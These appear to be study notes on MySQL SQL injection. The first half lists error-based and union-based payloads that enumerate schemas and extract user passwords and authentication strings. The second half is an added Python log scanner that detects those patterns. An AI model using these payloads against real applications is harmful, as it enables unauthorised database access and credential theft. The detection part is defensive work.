MYSQL
Authenticated SQLi
SELECT version();
SELECT system_user();
show databases;
SHOW TABLES FROM database_name;
OR
use <db_name>
show tables;
describe users; # describes the columns of the users table
SELECT * from <test>.<users>; # here test is the database and users is a table inside it
SELECT user, authentication_string FROM mysql.user WHERE user = 'test';
Error based SQLi
tom' OR 1=1 -- //
' or 1=1 in (select @@version) -- //
' OR 1=1 in (SELECT * FROM users) -- //
' or 1=1 in (SELECT password FROM users) -- //
' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- // # password for admin user
Union-based SQLi
*** the injected UNION query has to return the same number of columns as the original query
*** the data types of each column pair need to be compatible
1) Finding the number of Columns
' ORDER BY 1-- // # keep incrementing the number until the query errors; the last working value is the column count
2) Finding name, user, and version
%' UNION SELECT database(), user(), @@version, null, null -- // # the leading %' closes the original search parameter
# Assuming step 1 found 5 columns, 3 are used here and the remaining 2 are set to null
2.1) Finding name, user, and version
# Sometimes column 1 is an ID field that the page never displays, so the value does not show up; shift the values to later columns instead
' UNION SELECT null, null, database(), user(), @@version -- //
3) Enumerating table names, column names, and db_name
' UNION SELECT null, table_name, column_name, table_schema, null from information_schema.columns where table_schema=database() -- //
# columns 1 and 5 are kept null
# we see a table called users, let's dive into that
4) Enumerating a few columns from the users table found above
' UNION SELECT null, username, password, description, null FROM users -- //
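As an added, defender-side example that is not part of these notes: a small Python scanner that URL-decodes the query string of access-log lines and flags the probing steps listed above (tautologies, ORDER BY column probing, UNION SELECT, information_schema reads, version/user fingerprinting and the MySQL `-- //` terminator). The log format and every log line are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (illustrative, not from a real server)
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /search?q=laptop HTTP/1.1" 200',
    '10.0.0.7 - - "GET /search?q=%27+ORDER+BY+5--+%2F%2F HTTP/1.1" 500',
    '10.0.0.7 - - "GET /search?q=%25%27+UNION+SELECT+database%28%29%2C+user%28%29%2C'
    '+%40%40version%2C+null%2C+null+--+%2F%2F HTTP/1.1" 200',
    '10.0.0.9 - - "GET /login?user=tom%27+OR+1%3D1+--+%2F%2F HTTP/1.1" 302',
    '10.0.0.7 - - "GET /search?q=%27+UNION+SELECT+null%2C+table_name%2C+column_name%2C'
    '+table_schema%2C+null+from+information_schema.columns+where+table_schema%3D'
    'database%28%29+--+%2F%2F HTTP/1.1" 200',
    '10.0.0.11 - - "GET /search?q=order+by+price HTTP/1.1" 200',
]

# Each pattern corresponds to one probing step from the notes above
PATTERNS = {
    "tautology": re.compile(r"'\s*or\s+1\s*=\s*1", re.I),          # ' OR 1=1
    "column_probe": re.compile(r"'\s*order\s+by\s+\d+", re.I),      # ' ORDER BY n
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"information_schema\.(?:tables|columns)", re.I),
    "fingerprint": re.compile(r"@@version|\bdatabase\(\)|\buser\(\)", re.I),
    "comment_terminator": re.compile(r"--\s*//"),                    # MySQL -- // tail
}

def decode_query(line):
    """Pull the query string out of a combined-log request line and URL-decode it."""
    m = re.search(r'"(?:GET|POST)\s+\S*\?(\S*)\s+HTTP', line)
    return unquote_plus(m.group(1)) if m else ""

def classify(line):
    """Return the sorted list of pattern names that match the decoded query."""
    q = decode_query(line)
    return sorted(name for name, pat in PATTERNS.items() if pat.search(q))

def scan(lines):
    """Return (index, tags) for every line that triggers at least one pattern."""
    hits = []
    for i, line in enumerate(lines):
        tags = classify(line)
        if tags:
            hits.append((i, tags))
    return hits

if __name__ == "__main__":
    for i, tags in scan(SAMPLE_LOG):
        print(f"line {i}: {', '.join(tags)} :: {decode_query(SAMPLE_LOG[i])}")
```

The benign `order by price` request is not flagged because the column-probe pattern requires a closing quote followed by a numeric position, which is what distinguishes the probing step from ordinary sorting parameters.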